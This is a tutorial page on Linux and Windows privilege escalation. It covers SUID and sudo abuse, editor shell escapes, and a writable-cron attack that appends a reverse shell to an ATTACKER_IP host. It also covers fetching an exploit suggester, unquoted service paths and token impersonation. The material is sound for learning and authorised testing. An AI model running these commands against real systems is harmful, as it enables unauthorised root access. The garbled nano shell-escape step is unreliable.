Privilege Escalation

Introduction to Privilege Escalation

Privilege escalation is a critical step in both offensive and defensive cybersecurity, where gaining unauthorized elevated access—such as administrative or root access—enables actions like reading sensitive data, installing programs, or changing system settings. This can occur through vertical privilege escalation, where a regular user escalates to an administrator or root, or horizontal privilege escalation, where a user accesses another user’s resources at the same privilege level. In the context of post-exploitation, privilege escalation is vital for attackers to gain full control over a system, allowing them to persist, move laterally through the network, and potentially exfiltrate data. Once higher privileges are obtained, attackers may establish persistence by creating new user accounts, installing backdoors, or modifying system scripts to maintain access. For defenders, understanding privilege escalation is key to detecting unauthorized access and securing systems against these types of attacks.

Video Credit: The Cyber Mentor - Privilege Escalation

Linux Privilege Escalation

In Linux environments, privilege escalation is often achieved by exploiting system misconfigurations, vulnerable software, or weak file permissions. The goal is to elevate access from a normal user to root (the superuser), giving full control over the system.

Tools Required

Several tools can help you gather the necessary information for privilege escalation. These tools automate enumeration and vulnerability checking:

Enumerating System Information

Before attempting privilege escalation, you must gather detailed information about the system. This will help you identify potential weaknesses that you can exploit. Start by using the following commands:

uname -a     # Get kernel version
hostname    # Get the system hostname
whoami      # Check your current user privileges
id          # Get user and group IDs

For example, uname -a returns information about the kernel version and architecture, which helps determine whether a kernel exploit may be applicable. The whoami command confirms your current privileges, and id shows your user and group IDs, which are critical for understanding which resources you have access to.

Checking for SUID Files

On Linux systems, SUID (Set User ID) files allow programs to be executed with the privileges of the file's owner, which is often root. Misconfigured SUID files can be exploited to escalate privileges.

Use the following command to find SUID files:

find / -perm -4000 2>/dev/null

This command searches the entire file system for files with the SUID bit set. Look for common exploitable files, such as /bin/bash or /usr/bin/sudo. If you find an SUID binary owned by root, there’s a chance it can be exploited to gain root access.

Example Exploit: SUID Bash Binary

If the /bin/bash binary is misconfigured with SUID permissions, you can run the following command to gain root access:

/bin/bash -p

The -p flag preserves the SUID permissions, allowing you to execute Bash with root privileges.

Exploiting Misconfigured Sudo Permissions

Users often have permissions to run specific commands as root using sudo. If these commands are misconfigured, they can be exploited to escalate privileges. To check your sudo permissions, use:

sudo -l

If you are allowed to run certain commands without a password, you might be able to exploit these commands to gain root access. For example, if you have permission to run /bin/bash as root, you can escalate privileges like this:

sudo /bin/bash

You now have a root shell!

Exploiting Specific Commands

Sometimes you might have permission to run specific commands, like nano, vim, or even editors like vi. These can be leveraged to spawn a root shell by executing commands from within the editor’s shell mode:

sudo nano

Then press Ctrl + X to enter command mode and execute:

!bash

This will drop you into a root shell.

Exploiting Cron Jobs

Cron jobs are scheduled tasks that run periodically. If a cron job is misconfigured, you might be able to inject malicious commands that will run with elevated privileges. First, check for cron jobs using:

cat /etc/crontab

Inspect the output to see if any scripts or commands are being run by root. If these scripts are writable, you can modify them to include your payload.

Example Exploit: Writable Cron Script

Suppose you find a script, /usr/local/bin/backup.sh, that is run by root every hour. If the script is writable, you can append the following line to spawn a root shell:

echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /usr/local/bin/backup.sh

This command will spawn a reverse shell to your attack machine, giving you root access when the cron job runs.

Kernel Exploits

If the Linux kernel is outdated, you may be able to exploit a known vulnerability to escalate privileges. Tools like linux-exploit-suggester will help you identify which exploits are applicable based on the system’s kernel version.

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

Run the script and analyze the output. If an applicable kernel exploit is suggested, research the exploit further and attempt it.

Windows Privilege Escalation

Windows privilege escalation often involves exploiting misconfigurations in services, registry keys, or file permissions. Here are the most common methods used to escalate privileges on Windows systems.

Tools Required

Enumerating System Information

Similar to Linux, begin by gathering information about the Windows system. The following commands will give you critical information:

systeminfo      # Detailed system information
whoami /priv   # View privileges of the current user

Look for any enabled privileges that you may be able to exploit, such as SeImpersonatePrivilege or SeBackupPrivilege.

Abusing Unquoted Service Paths

Unquoted service paths are a common misconfiguration that can be exploited. If a service is configured with an unquoted path, an attacker can place a malicious executable in the path to gain elevated privileges.

sc qc [ServiceName]

If the service path is unquoted and there are spaces in the path, place a malicious binary in a higher directory to be executed instead of the intended executable.

Exploiting Insecure Registry Permissions

The Windows registry stores system settings, and if certain registry keys have insecure permissions, you can modify them to escalate privileges. Use the following command to query registry permissions:

reg query HKLM /s /v "Start"

If a key is writable, modify it to point to a malicious executable or script that will run with SYSTEM privileges.

Using Token Impersonation

Windows uses tokens to manage user permissions. If you have the SeImpersonatePrivilege, you can impersonate a higher-privileged user. Tools like PrintSpoofer or Juicy Potato can automate this process.